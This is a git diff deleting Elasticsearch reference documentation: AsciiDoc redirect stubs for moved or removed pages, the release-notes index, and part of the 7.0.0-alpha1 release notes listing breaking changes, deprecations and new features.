-[role="exclude",id="_explain_analyze"] -=== Explain analyze API -See <>. - -[role="exclude",id="indices-synced-flush"] -=== Synced flush API -See <>. - -[role="exclude",id="_repositories"] -=== Snapshot repositories -See <>. - -[role="exclude",id="_snapshot"] -=== Snapshot -See <>. - -[role="exclude",id="getting-started-explore"] -=== Exploring your cluster -See <>. - -[role="exclude",id="getting-started-cluster-health"] -=== Cluster health -See <>. - -[role="exclude", id="getting-started-list-indices"] -=== List all indices -See <>. - -[role="exclude", id="getting-started-create-index"] -=== Create an index -See <>. - -[role="exclude", id="getting-started-query-document"] -=== Index and query a document -See <>. - -[role="exclude", id="getting-started-delete-index"] -=== Delete an index -See <>. 
- -[role="exclude", id="getting-started-modify-data"] -== Modifying your data -See <>. - -[role="exclude", id="indexing-replacing-documents"] -=== Indexing/replacing documents -See <>. - -[role="exclude", id="getting-started-explore-data"] -=== Exploring your data -See <>. - -[role="exclude", id="getting-started-search-API"] -=== Search API -See <>. - -[role="exclude", id="getting-started-conclusion"] -=== Conclusion -See <>. - -[role="exclude",id="ccs-reduction"] -=== {ccs-cap} reduction -See <>. - -[role="exclude",id="administer-elasticsearch"] -=== Administering {es} -See <>. - -[role="exclude",id="slm-api"] -=== Snapshot lifecycle management API -See <>. - -[role="exclude",id="delete-data-frame-transform"] -=== Delete {transforms} API - -See <>. - -[role="exclude",id="get-data-frame-transform-stats"] -=== Get {transform} statistics API - -See <>. - -[role="exclude",id="get-data-frame-transform"] -=== Get {transforms} API - -See <>. - -[role="exclude",id="preview-data-frame-transform"] -=== Preview {transforms} API - -See <>. - -[role="exclude",id="put-data-frame-transform"] -=== Create {transforms} API - -See <>. - -[role="exclude",id="start-data-frame-transform"] -=== Start {transforms} API - -See <>. - -[role="exclude",id="stop-data-frame-transform"] -=== Stop {transforms} API - -See <>. - -[role="exclude",id="update-data-frame-transform"] -=== Update {transforms} API - -See <>. - -[role="exclude",id="data-frame-apis"] -=== {transform-cap} APIs - -See <>. - -[role="exclude",id="data-frame-transform-resource"] -=== {transform-cap} resources - -See <>. - -[role="exclude",id="data-frame-transform-dest"] -=== Dest objects - -See <>. - -[role="exclude",id="data-frame-transform-source"] -==== Source objects - -See <>. - -[role="exclude",id="data-frame-transform-pivot"] -==== Pivot objects - -See <>. - -[role="exclude",id="configuring-monitoring"] -=== Configuring monitoring - -See <>. - -[role="exclude",id="es-monitoring"] -=== Monitoring {es} - -See <>. - -[role="exclude",id="docker-cli-run"] -=== Docker Run - -See <>. - -[role="exclude",id="auditing"] -=== Audit logging - -See <>. - -[role="exclude",id="analysis-compound-word-tokenfilter"] -=== Compound word token filters - -See <> and -<>. - -[role="exclude",id="configuring-native-realm"] -=== Configuring a native realm - -See <>. - -[role="exclude",id="native-settings"] -==== Native realm settings - -See <>. - -[role="exclude",id="configuring-saml-realm"] -=== Configuring a SAML realm - -See <>. - -[role="exclude",id="saml-settings"] -==== SAML realm settings - -See <>. - -[role="exclude",id="_saml_realm_signing_settings"] -==== SAML realm signing settings - -See <>. - -[role="exclude",id="_saml_realm_encryption_settings"] -==== SAML realm encryption settings - -See <>. - -[role="exclude",id="_saml_realm_ssl_settings"] -==== SAML realm SSL settings - -See <>. - -[role="exclude",id="configuring-file-realm"] -=== Configuring a file realm - -See <>. - -[role="exclude",id="ldap-user-search"] -=== User search mode and user DN templates mode - -See <>. - -[role="exclude",id="configuring-ldap-realm"] -=== Configuring an LDAP realm - -See <>. - -[role="exclude",id="ldap-settings"] -=== LDAP realm settings - -See <>. - -[role="exclude",id="ldap-ssl"] -=== Setting up SSL between Elasticsearch and LDAP - -See <>. - -[role="exclude",id="configuring-kerberos-realm"] -=== Configuring a Kerberos realm - -See <>. 
- -[role="exclude",id="beats"] -=== Beats and Security - -See: - -* {auditbeat-ref}/securing-auditbeat.html[{auditbeat}] -* {filebeat-ref}/securing-filebeat.html[{filebeat}] -* {heartbeat-ref}/securing-heartbeat.html[{heartbeat}] -* {metricbeat-ref}/securing-metricbeat.html[{metricbeat}] -* {packetbeat-ref}/securing-packetbeat.html[{packetbeat}] -* {winlogbeat-ref}/securing-winlogbeat.html[{winlogbeat}] - -[role="exclude",id="configuring-pki-realm"] -=== Configuring a PKI realm - -See <>. - -[role="exclude",id="pki-settings"] -==== PKI realm settings - -See <>. - -[role="exclude",id="configuring-ad-realm"] -=== Configuring an Active Directory realm - -See <>. - -[role="exclude",id="ad-settings"] -=== Active Directory realm settings - -See <>. - -[role="exclude",id="mapping-roles-ad"] -=== Mapping Active Directory users and groups to roles - -See <>. - -[role="exclude",id="how-security-works"] -=== How security works - -See <>. - -[role="exclude",id="rollup-job-config"] -=== Rollup job configuration - -See <>. - -[role="exclude",id="transform-resource"] -=== {transform-cap} resources - -This page was deleted. -See <>, <>, <>, -<>. - -[role="exclude",id="ml-job-resource"] -=== Job resources - -This page was deleted. -[[ml-analysisconfig]] -See the details in -[[ml-apimodelplotconfig]] -<>, <>, and <>. - -[role="exclude",id="ml-datafeed-resource"] -=== {dfeed-cap} resources - -This page was deleted. -[[ml-datafeed-chunking-config]] -See the details in <>, <>, -[[ml-datafeed-delayed-data-check-config]] -<>, -[[ml-datafeed-counts]] -<>. - -[role="exclude",id="ml-jobstats"] -=== Job statistics - -This -[[ml-datacounts]] -page -[[ml-modelsizestats]] -was -[[ml-forecastsstats]] -deleted. -[[ml-timingstats]] -See -[[ml-stats-node]] -the details in <>. - -[role="exclude",id="ml-snapshot-resource"] -=== Model snapshot resources - -This page was deleted. -[[ml-snapshot-stats]] -See <> and <>. - -[role="exclude",id="ml-dfanalytics-resources"] -=== {dfanalytics-cap} job resources - -This page was deleted. -See <>. - -[role="exclude",id="ml-dfa-analysis-objects"] -=== Analysis configuration objects - -This page was deleted. -See <>. - -[role="exclude",id="put-inference"] -=== Create trained model API - -See <>. - -[role="exclude",id="get-inference-stats"] -=== Get trained model statistics API - -See <>. - -[role="exclude",id="get-inference"] -=== Get trained model API - -See <>. - -[role="exclude",id="delete-inference"] -=== Delete trained model API - -See <>. - -[role="exclude",id="data-frames-settings"] -=== {transforms-cap} settings in Elasticsearch - -See <>. - -[role="exclude",id="general-data-frames-settings"] -==== General {transforms} settings - -See <>. - -[role="exclude",id="ml-results-resource"] -=== Results resources - -This page was deleted. -[[ml-results-buckets]] -See <>, -[[ml-results-bucket-influencers]] -<>, -[[ml-results-influencers]] -<>, -[[ml-results-records]] -<>, -[[ml-results-categories]] -<>, and -[[ml-results-overall-buckets]] -<>. - -[role="exclude",id="modules-snapshots"] -=== Snapshot module - -See <>. - -[role="exclude",id="_repository_plugins"] -==== Repository plugins - -See <>. - -[role="exclude",id="_changing_index_settings_during_restore"] -==== Change index settings during restore - -See <>. - -[role="exclude",id="restore-snapshot"] -=== Restore snapshot - -See <>. - -[role="exclude",id="snapshots-repositories"] -=== Snapshot repositories - -See <>. - -[role="exclude",id="slm-api-delete"] -=== {slm-init} delete policy API - -See <>. 
- -[role="exclude",id="slm-api-execute"] -=== {slm-init} execute lifecycle API - -See <>. - -[role="exclude",id="slm-api-execute-policy"] -=== {slm-init} execute lifecycle API - -See <>. - -[role="exclude",id="slm-api-get"] -=== {slm-init} get policy API - -See <>. - -[role="exclude",id="slm-get-stats"] -=== {slm-init} get stats API - -See <>. - -[role="exclude",id="slm-get-status"] -=== {slm-init} status API - -See <>. - -[role="exclude",id="slm-api-put"] -=== {slm-init} put policy API - -See <>. - -[role="exclude",id="slm-start"] -=== Start {slm} API - -See <>. - -[role="exclude",id="slm-stop"] -=== Stop {slm} API - -See <>. - -[role="exclude",id="ccs-works"] -=== How {ccs} works - -See <> and <>. - -[role="exclude",id="modules-indices"] -=== Indices module - -See: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[role="exclude",id="cat-transform"] -=== cat transform API - -See <>. - -[role="exclude",id="testing"] -=== Testing - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[#55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - -[role="exclude",id="testing-framework"] -=== Java testing framework - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference because it was out of date and -erroneously implied that it should be used by application developers. - -There is an issue ({es-issue}55258[#55258]) for providing general testing -guidance for applications that communicate with {es}. - - -[role="exclude",id="why-randomized-testing"] -=== Why randomized testing? - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="using-elasticsearch-test-classes"] -=== Using the {es} test classes - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="unit-tests"] -=== Unit tests - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="integration-tests"] -=== Integration tests - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. 
- - -[role="exclude",id="number-of-shards"] -==== Number of shards - -This section was deleted. - -[role="exclude",id="helper-methods"] -==== Generic helper methods - -This section was deleted. - -[role="exclude",id="test-cluster-methods"] -==== Test cluster methods - -This section was deleted. - -[role="exclude",id="changing-node-settings"] -==== Changing node settings - -This section was deleted. - -[role="exclude",id="accessing-clients"] -==== Accessing clients - -This section was deleted. - -[role="exclude",id="scoping"] -==== Scoping - -This section was deleted. - -[role="exclude",id="changing-node-configuration"] -==== Changing plugins via configuration - -This section was deleted. - -[role="exclude",id="randomized-testing"] -=== Randomized testing - -This page was deleted. - -[role="exclude",id="generating-random-data"] -==== Generating random data - -This section was deleted. - -[role="exclude",id="assertions"] -=== Assertions - -This page was deleted. - -[role="exclude",id="_actions"] -=== {ilm-init} actions - -See <>. - -[role="exclude",id="ilm-allocate-action"] -==== Allocate action - -See <>. - -[role="exclude",id="ilm-delete-action"] -==== Delete action - -See <>. - -[role="exclude",id="ilm-forcemerge-action"] -==== Force merge action - -See <>. - -[role="exclude",id="ilm-freeze-action"] -==== Freeze action - -See <>. - -[role="exclude",id="ilm-migrate-action"] -==== Migrate action - -See <>. - -[role="exclude",id="ilm-readonly-action"] -==== Read only action - -See <>. - -[role="exclude",id="ilm-rollover-action"] -==== Rollover action - -See <>. - -[role="exclude",id="ilm-searchable-snapshot-action"] -==== Searchable snapshot action - -See <>. - -[role="exclude",id="ilm-set-priority-action"] -==== Set priority action - -See <>. - -[role="exclude",id="ilm-shrink-action"] -==== Shrink action - -See <>. - -[role="exclude",id="ilm-unfollow-action"] -==== Unfollow action - -See <>. - -[role="exclude",id="ilm-wait-for-snapshot-action"] -==== Wait for snapshot action - -See <>. - -[role="exclude",id="ilm-policy-definition"] -=== {ilm-init} policy definition - -See <>. - -[role="exclude",id="search-uri-request"] -=== URI search - -See <>. - -[role="exclude",id="modules-gateway-dangling-indices"] -=== Dangling indices - -See <>. - -[role="exclude",id="shards-allocation"] -=== Cluster-level shard allocation - -See <>. - -[role="exclude",id="disk-allocator"] -=== Disk-based shard allocation - -See <>. - -[role="exclude",id="allocation-awareness"] -=== Shard allocation awareness - -See <>. - -[role="exclude",id="allocation-filtering"] -=== Cluster-level shard allocation filtering - -See <>. - -[role="exclude",id="misc-cluster"] -=== Miscellaneous cluster settings - -See <>. - -[role="exclude",id="modules"] -=== Modules - -This page has been removed. - -See <> for settings information: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -For other information, see: - -* <> -* <> -* <> -* <> -* <> - -[role="exclude",id="modules-discovery-adding-removing-nodes"] -=== Adding and removing nodes - -See <>. - -[role="exclude",id="_timing"] -=== Timing - -See <>. - -[role="exclude",id="_installation"] -=== Installation - -See <>. - -[role="exclude",id="mapping-ttl-field"] -=== `_ttl` mappings - -The `_ttl` mappings have been removed. As a replacement for `_ttl` -mappings, we recommend using <> to create -time-based indices. - -[role="exclude",id="setup-service"] -=== Running as a service on Linux - -See <>. 
- -[role="exclude",id="modules-scripting-painless-syntax"] -=== Painless syntax - -See {painless}/painless-lang-spec.html[Painless language specification]. - -[role="exclude",id="using-policies-rollover"] -=== Using policies to manage index rollover - -See <>. - -[role="exclude",id="_applying_a_policy_to_our_index"] -=== Applying a policy to our index - -See <>. - -[role="exclude",id="setup-dir-layout"] -=== Directory layout - -See <>. - -[role="exclude",id="scan-scroll"] -=== Scan and scroll - -See <>. - -[role="exclude",id="mapping-dynamic-mapping"] -=== Dynamic mapping - -See <>. - -[role="exclude",id="applying-policy-to-template"] -=== Applying a policy to an index template - -See <>. - -[role="exclude",id="indices-status"] -=== Index status API - -The index `_status` API has been replaced with the <> and <> APIs. - -[role="exclude",id="search-facets"] -=== Search facets - -See <>. - -[role="exclude",id="_executing_searches"] -=== Executing searches - -See <>. - -[role="exclude",id="mapping-root-object-type"] -=== Mapping root object type - -Mapping types have been removed. See <>. - -[role="exclude",id="query-dsl-filters"] -=== Query DSL filters - -See <>. - -[role="exclude",id="esms"] -=== {esms} - -We have stopped adding new customers to our {esms}. - -If you are interested in similar capabilities, contact -https://support.elastic.co[Elastic Support] to discuss available options. - -[role="exclude",id="ilm-with-existing-periodic-indices"] -=== Manage existing periodic indices with {ilm-init} - -See <>. - -[role="exclude",id="ilm-reindexing-into-rollover"] -=== Reindexing via {ilm-init} - -See <>. - -[role="exclude",id="analysis-pathhierarchy-tokenizer-examples"] -=== Path hierarchy tokenizer examples - -See <>. - -[role="exclude",id="modules-tribe"] -=== Tribe node - -Tribe node functionality has been removed in favor of {ccs}. See -<>. - -[role="exclude",id="release-highlights-7.0.0"] -=== Release highlights - -See <>. - -[role="exclude",id="sql-settings"] -=== SQL access settings in Elasticsearch - -The `xpack.sql.enabled` setting has been deprecated. SQL access is always enabled. - -[role="exclude",id="indices-templates"] -=== Index templates [[getting]] - -See <>. - -[role="exclude",id="indices-template-exists"] -=== Index template exists (legacy) - -See <>. - -[role="exclude",id="run-a-search"] -=== Run a search - -See <>. - -[role="exclude",id="how-highlighters-work-internally"] -=== How highlighters work internally - -See <>. - -[role="exclude",id="eql-search"] -=== Run an EQL search - -See <>. - -[role="exclude",id="eql-limitations"] -=== EQL limitations - -See <>. - -[role="exclude",id="eql-requirements"] -=== EQL requirements - -See <>. - -[role="exclude",id="search-request-body"] -=== Request body search - -This page has been removed. - -For search API reference documentation, see <>. - -For search examples, see <>. - -[role="exclude",id="request-body-search-docvalue-fields"] -==== Doc value fields - -See <>. - -[role="exclude",id="_fast_check_for_any_matching_docs"] -==== Fast check for any matching docs - -See <>. - -[role="exclude",id="request-body-search-collapse"] -==== Field collapsing - -See <>. - -[role="exclude",id="request-body-search-from-size"] -==== From / size - -See <>. - -[role="exclude",id="request-body-search-highlighting"] -==== Highlighting - -See <>. - -[role="exclude",id="highlighter-internal-work"] -==== How highlighters work internally - -See <>. - -[role="exclude",id="request-body-search-index-boost"] -==== Index boost -See <>. 
- -[role="exclude",id="request-body-search-inner-hits"] -==== Inner hits -See <>. - -[role="exclude",id="request-body-search-min-score"] -==== `min_score` - -See the <> parameter. - -[role="exclude",id="request-body-search-queries-and-filters"] -==== Named queries - -See <>. - -[role="exclude",id="request-body-search-post-filter"] -==== Post filter - -See <>. - -[role="exclude",id="request-body-search-preference"] -==== Preference - -See <>. - -[role="exclude",id="request-body-search-rescore"] -==== Rescoring - -See <>. - -[role="exclude",id="request-body-search-script-fields"] -==== Script fields - -See <>. - -[role="exclude",id="request-body-search-scroll"] -==== Scroll - -See <>. - -[[_clear_scroll_api]] -==== Clear scroll API - -See <>. - -[[sliced-scroll]] -==== Sliced scroll - -See <>. - -[role="exclude",id="request-body-search-search-after"] -==== Search after - -See <>. - -[role="exclude",id="request-body-search-search-type"] -==== Search type - -See <>. - -[role="exclude",id="request-body-search-sort"] -==== Sort - -See <>. - -[role="exclude",id="request-body-search-source-filtering"] -==== Source filtering - -See <>. - -[role="exclude",id="request-body-search-stored-fields"] -==== Stored fields - -See <>. - -[role="exclude",id="request-body-search-track-total-hits"] -==== Track total hits - -See <>. - -[role="exclude",id="_notes_3"] -=== Joining queries notes - -See <>. - -[role="exclude",id="_notes_4"] -=== Percolate query notes - -See <>. - -[role="exclude",id="constant-keyword"] -=== Constant keyword field type - -See <>. - -[role="exclude",id="wildcard"] -=== Wildcard field type - -See <>. - -[role="exclude",id="searchable-snapshots-api-clear-cache"] -=== Clear cache API - -We have removed documentation for this API. This a low-level API used to clear -the searchable snapshot cache. We plan to remove or drastically change this API -as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="searchable-snapshots-api-stats"] -=== Searchable snapshot statistics API - -We have removed documentation for this API. This a low-level API used to get -information about searchable snapshot indices. We plan to remove or drastically -change this API as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="searchable-snapshots-repository-stats"] -=== Searchable snapshot repository statistics API - -We have removed documentation for this API. This a low-level API used to get -information about searchable snapshot indices. We plan to remove or drastically -change this API as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="point-in-time"] -=== Point in time API - -See <>. - -[role="exclude",id="avoid-oversharding"] -=== Avoid oversharding - -See <>. - -[role="exclude",id="_parameters_8"] -=== elasticsearch-croneval parameters - -See <>. - -[role="exclude",id="caching-heavy-aggregations"] -=== Caching heavy aggregations - -See <>. - -[role="exclude",id="returning-only-agg-results"] -=== Returning only aggregation results - -See <>. - -[role="exclude",id="agg-metadata"] -=== Aggregation metadata - -See <>. - -[role="exclude",id="returning-aggregation-type"] -=== Returning the type of the aggregation - -See <>. - -[role="exclude",id="indexing-aggregation-results"] -=== Indexing aggregation results with transforms - -See <>. - -[role="exclude",id="search-aggregations-matrix"] -=== Matrix aggregations - -See <>. 
- -[role="exclude",id="fielddata"] -=== `fielddata` mapping parameter - -See <>. diff --git a/docs/reference/release-notes.asciidoc b/docs/reference/release-notes.asciidoc deleted file mode 100644 index cc816a25b8f..00000000000 --- a/docs/reference/release-notes.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[es-release-notes]] -= Release notes - -[partintro] --- - -This section summarizes the changes in each release. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::release-notes/7.10.asciidoc[] -include::release-notes/7.9.asciidoc[] -include::release-notes/7.8.asciidoc[] -include::release-notes/7.7.asciidoc[] -include::release-notes/7.6.asciidoc[] -include::release-notes/7.5.asciidoc[] -include::release-notes/7.4.asciidoc[] -include::release-notes/7.3.asciidoc[] -include::release-notes/7.2.asciidoc[] -include::release-notes/7.1.asciidoc[] -include::release-notes/7.0.asciidoc[] -include::release-notes/7.0.0-rc2.asciidoc[] -include::release-notes/7.0.0-rc1.asciidoc[] -include::release-notes/7.0.0-beta1.asciidoc[] -include::release-notes/7.0.0-alpha2.asciidoc[] -include::release-notes/7.0.0-alpha1.asciidoc[] diff --git a/docs/reference/release-notes/7.0.0-alpha1.asciidoc b/docs/reference/release-notes/7.0.0-alpha1.asciidoc deleted file mode 100644 index 6584025c34a..00000000000 --- a/docs/reference/release-notes/7.0.0-alpha1.asciidoc +++ /dev/null @@ -1,459 +0,0 @@ -[[release-notes-7.0.0-alpha1]] -== {es} version 7.0.0-alpha1 - -The changes listed below have been released for the first time in Elasticsearch 7.0.0-alpha1. - -[[breaking-7.0.0-alpha1]] -[discrete] -=== Breaking changes - -Aggregations:: -* Remove support for deprecated params._agg/_aggs for scripted metric aggregations {es-pull}32979[#32979] (issues: {es-issue}29328[#29328], {es-issue}31597[#31597]) -* Percentile/Ranks should return null instead of NaN when empty {es-pull}30460[#30460] (issue: {es-issue}29066[#29066]) -* Render sum as zero if count is zero for stats aggregation {es-pull}27193[#27193] (issue: {es-issue}26893[#26893]) - -Analysis:: -* Remove `delimited_payload_filter` {es-pull}27705[#27705] (issues: {es-issue}26625[#26625], {es-issue}27704[#27704]) -* Limit the number of tokens produced by _analyze {es-pull}27529[#27529] (issue: {es-issue}27038[#27038]) -* Add limits for ngram and shingle settings {es-pull}27211[#27211] (issue: {es-issue}25887[#25887]) - -Audit:: -* Logfile auditing settings remove after deprecation {es-pull}35205[#35205] - -Authentication:: -* Security: remove wrapping in put user response {es-pull}33512[#33512] (issue: {es-issue}32332[#32332]) - -Authorization:: -* Remove aliases resolution limitations when security is enabled {es-pull}31952[#31952] (issue: {es-issue}31516[#31516]) - -CRUD:: -* Version conflict exception message enhancement {es-pull}29432[#29432] (issue: {es-issue}21278[#21278]) -* Using ObjectParser in UpdateRequest {es-pull}29293[#29293] (issue: {es-issue}28740[#28740]) - -Distributed:: -* Remove undocumented action.master.force_local setting {es-pull}29351[#29351] -* Remove tribe node support {es-pull}28443[#28443] -* Forbid negative values for index.unassigned.node_left.delayed_timeout {es-pull}26828[#26828] - -Features/Indices APIs:: -* Indices Exists API should return 404 for empty wildcards {es-pull}34499[#34499] -* Default to one shard {es-pull}30539[#30539] -* Limit the number of nested documents 
{es-pull}27405[#27405] (issue: {es-issue}26962[#26962]) - -Features/Ingest:: -* INGEST: Add Configuration Except. Data to Metdata {es-pull}32322[#32322] (issue: {es-issue}27728[#27728]) - -Features/Stats:: -* Remove the suggest metric from stats APIs {es-pull}29635[#29635] (issue: {es-issue}29589[#29589]) -* Align cat thread pool info to thread pool config {es-pull}29195[#29195] (issue: {es-issue}29123[#29123]) -* Align thread pool info to thread pool configuration {es-pull}29123[#29123] (issue: {es-issue}29113[#29113]) - -Geo:: -* Use geohash cell instead of just a corner in geo_bounding_box {es-pull}30698[#30698] (issue: {es-issue}25154[#25154]) - -Infra/Circuit Breakers:: -* Introduce durability of circuit breaking exception {es-pull}34460[#34460] (issue: {es-issue}31986[#31986]) -* Circuit-break based on real memory usage {es-pull}31767[#31767] - -Infra/Core:: -* Core: Default node.name to the hostname {es-pull}33677[#33677] -* Remove bulk fallback for write thread pool {es-pull}29609[#29609] -* CCS: Drop http address from remote cluster info {es-pull}29568[#29568] (issue: {es-issue}29207[#29207]) -* Remove the index thread pool {es-pull}29556[#29556] -* Main response should not have status 503 when okay {es-pull}29045[#29045] (issue: {es-issue}8902[#8902]) -* Automatically prepare indices for splitting {es-pull}27451[#27451] -* Don't refresh on `_flush` `_force_merge` and `_upgrade` {es-pull}27000[#27000] (issue: {es-issue}26972[#26972]) - -Infra/Packaging:: -* Packaging: Remove windows bin files from the tar distribution {es-pull}30596[#30596] - -Infra/REST API:: -* REST: Remove GET support for clear cache indices {es-pull}29525[#29525] -* REST : Clear Indices Cache API remove deprecated url params {es-pull}29068[#29068] - -Infra/Scripting:: -* Remove support for deprecated StoredScript contexts {es-pull}31394[#31394] (issues: {es-issue}27612[#27612], {es-issue}28939[#28939]) -* Scripting: Remove getDate methods from ScriptDocValues {es-pull}30690[#30690] -* Handle missing and multiple values in script {es-pull}29611[#29611] (issue: {es-issue}29286[#29286]) -* Drop `ScriptDocValues#date` and `ScriptDocValues#dates` in 7.0.0 [ISSUE] {es-pull}23008[#23008] - -Infra/Settings:: -* Remove config prompting for secrets and text {es-pull}27216[#27216] - -Mapping:: -* Match phrase queries against non-indexed fields should throw an exception {es-pull}31060[#31060] -* Remove legacy mapping code. {es-pull}29224[#29224] -* Reject updates to the `_default_` mapping. {es-pull}29165[#29165] (issues: {es-issue}15613[#15613], {es-issue}28248[#28248]) -* Remove the `update_all_types` option. {es-pull}28288[#28288] -* Remove the `_default_` mapping. {es-pull}28248[#28248] -* Reject the `index_options` parameter for numeric fields {es-pull}26668[#26668] (issue: {es-issue}21475[#21475]) - -Network:: -* Network: Remove http.enabled setting {es-pull}29601[#29601] (issue: {es-issue}12792[#12792]) -* Remove HTTP max content length leniency {es-pull}29337[#29337] - -Percolator:: -* remove deprecated percolator map_unmapped_fields_as_string setting {es-pull}28060[#28060] - -Ranking:: -* Add minimal sanity checks to custom/scripted similarities. 
{es-pull}33564[#33564] (issue: {es-issue}33309[#33309]) -* Scroll queries asking for rescore are considered invalid {es-pull}32918[#32918] (issue: {es-issue}31775[#31775]) - -Search:: -* Remove deprecated url parameters `_source_include` and `_source_exclude` {es-pull}35097[#35097] (issues: {es-issue}22792[#22792], {es-issue}33475[#33475]) -* Disallow negative query boost {es-pull}34486[#34486] (issue: {es-issue}33309[#33309]) -* Forbid negative `weight` in Function Score Query {es-pull}33390[#33390] (issue: {es-issue}31927[#31927]) -* In the field capabilities API, remove support for providing fields in the request body. {es-pull}30185[#30185] -* Remove deprecated options for query_string {es-pull}29203[#29203] (issue: {es-issue}25551[#25551]) -* Fix Laplace scorer to multiply by alpha (and not add) {es-pull}27125[#27125] -* Remove _primary and _replica shard preferences {es-pull}26791[#26791] (issue: {es-issue}26335[#26335]) -* Limit the number of expanded fields it query_string and simple_query_string {es-pull}26541[#26541] (issue: {es-issue}25105[#25105]) -* Make purely negative queries return scores of 0. {es-pull}26015[#26015] (issue: {es-issue}23449[#23449]) - -Snapshot/Restore:: -* Include size of snapshot in snapshot metadata {es-pull}30890[#30890] (issue: {es-issue}18543[#18543]) -* Remove azure deprecated settings {es-pull}26099[#26099] (issue: {es-issue}23405[#23405]) - -Store:: -* drop elasticsearch-translog for 7.0 {es-pull}33373[#33373] (issues: {es-issue}31389[#31389], {es-issue}32281[#32281]) -* completely drop `index.shard.check_on_startup: fix` for 7.0 {es-pull}33194[#33194] - -Suggesters:: -* Fix threshold frequency computation in Suggesters {es-pull}34312[#34312] (issue: {es-issue}34282[#34282]) -* Make Geo Context Mapping Parsing More Strict {es-pull}32821[#32821] (issues: {es-issue}32202[#32202], {es-issue}32412[#32412]) -* Make Geo Context Parsing More Strict {es-pull}32412[#32412] (issue: {es-issue}32202[#32202]) -* Remove the ability to index or query context suggestions without context {es-pull}31007[#31007] (issue: {es-issue}30712[#30712]) - - - -[[breaking-java-7.0.0-alpha1]] -[discrete] -=== Breaking Java changes - -Aggregations:: -* Change GeoHashGrid.Bucket#getKey() to return String {es-pull}31748[#31748] (issue: {es-issue}30320[#30320]) - -Analysis:: -* Remove deprecated AnalysisPlugin#requriesAnalysisSettings method {es-pull}32037[#32037] (issue: {es-issue}32025[#32025]) - -Features/Java High Level REST Client:: -* API: Drop deprecated methods from Retry {es-pull}33925[#33925] -* REST hl client: cluster health to default to cluster level {es-pull}31268[#31268] (issue: {es-issue}29331[#29331]) -* REST high-level Client: remove deprecated API methods {es-pull}31200[#31200] (issue: {es-issue}31069[#31069]) - -Features/Java Low Level REST Client:: -* LLREST: Drop deprecated methods {es-pull}33223[#33223] (issues: {es-issue}29623[#29623], {es-issue}30315[#30315]) - -Geo:: -* [Geo] Decouple geojson parse logic from ShapeBuilders {es-pull}27212[#27212] - -Infra/Core:: -* Core: Remove RequestBuilder from Action {es-pull}30966[#30966] - -Infra/Transport API:: -* Java api clean up: remove deprecated `isShardsAcked` {es-pull}28311[#28311] (issues: {es-issue}27784[#27784], {es-issue}27819[#27819]) - -[[deprecation-7.0.0-alpha1]] -[discrete] -=== Deprecations - -Analysis:: -* Replace parameter unicodeSetFilter with unicode_set_filter {es-pull}29215[#29215] (issue: {es-issue}22823[#22823]) -* Replace delimited_payload_filter by delimited_payload {es-pull}26625[#26625] 
(issue: {es-issue}21978[#21978]) - -Features/Indices APIs:: -* Default copy settings to true and deprecate on the REST layer {es-pull}30598[#30598] - -Infra/Transport API:: -* Deprecate the transport client in favour of the high-level REST client {es-pull}27085[#27085] - -Mapping:: -* Deprecate type exists requests. {es-pull}34663[#34663] - -Search:: -* Deprecate filtering on `_type`. {es-pull}29468[#29468] (issue: {es-issue}15613[#15613]) - - - -[[feature-7.0.0-alpha1]] -[discrete] -=== New features - -Analysis:: -* Relax TermVectors API to work with textual fields other than TextFieldType {es-pull}31915[#31915] (issue: {es-issue}31902[#31902]) - -CCR:: -* Generalize search.remote settings to cluster.remote {es-pull}33413[#33413] - -Distributed:: -* log messages from allocation commands {es-pull}25955[#25955] (issues: {es-issue}22821[#22821], {es-issue}25325[#25325]) - -Features/Ingest:: -* Revert "Introduce a Hashing Processor (#31087)" {es-pull}32178[#32178] -* Add ingest-attachment support for per document `indexed_chars` limit {es-pull}28977[#28977] (issue: {es-issue}28942[#28942]) - -Features/Java High Level REST Client:: -* GraphClient for the high level REST client and associated tests {es-pull}32366[#32366] - -Features/Monitoring:: -* [Elasticsearch Monitoring] Collect only display_name (for now) {es-pull}35265[#35265] (issue: {es-issue}8445[#8445]) - -Infra/Core:: -* Skip shard refreshes if shard is `search idle` {es-pull}27500[#27500] - -Infra/Logging:: -* Logging: Unify log rotation for index/search slow log {es-pull}27298[#27298] - -Infra/Plugins:: -* Reload secure settings for plugins {es-pull}31383[#31383] (issue: {es-issue}29135[#29135]) - -Infra/REST API:: -* Add an `include_type_name` option. {es-pull}29453[#29453] (issue: {es-issue}15613[#15613]) - -Machine Learning:: -* [ML] Filter undefined job groups from update job calendar actions {es-pull}30757[#30757] - -Mapping:: -* Add a `feature_vector` field. {es-pull}31102[#31102] (issue: {es-issue}27552[#27552]) -* Expose Lucene's FeatureField. 
